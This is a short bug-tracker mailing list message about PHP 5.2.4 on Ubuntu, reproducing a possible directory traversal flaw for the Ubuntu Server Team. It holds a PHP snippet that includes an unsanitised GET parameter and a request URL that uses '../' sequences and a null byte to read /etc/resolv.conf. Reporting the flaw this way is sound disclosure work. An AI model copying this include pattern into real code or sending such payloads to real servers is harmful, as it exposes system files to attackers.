[Bug 491835] Re: PHP 5.2.4-2ubuntu5.9 Possible exploit using directory traversal
Toomas Vahtra
toomas.vahtra at gmail.com
Thu Dec 3 14:12:37 GMT 2009
I reproduced the same effect using webroot /var/www
file test.php:
<?php
if($_GET["pageID"])
$pageID=$_GET["pageID"];
include('page.'.$pageID.'.inc');
?>
http://myserver/test.php?pageID=/../../../etc/resolv.conf%00
filesystem is ext3 on a local harddrive
--
PHP 5.2.4-2ubuntu5.9 Possible exploit using directory traversal
https://bugs.launchpad.net/bugs/491835
You received this bug notification because you are a member of Ubuntu
Server Team, which is a direct subscriber.
More information about the Ubuntu-server-bugs
mailing list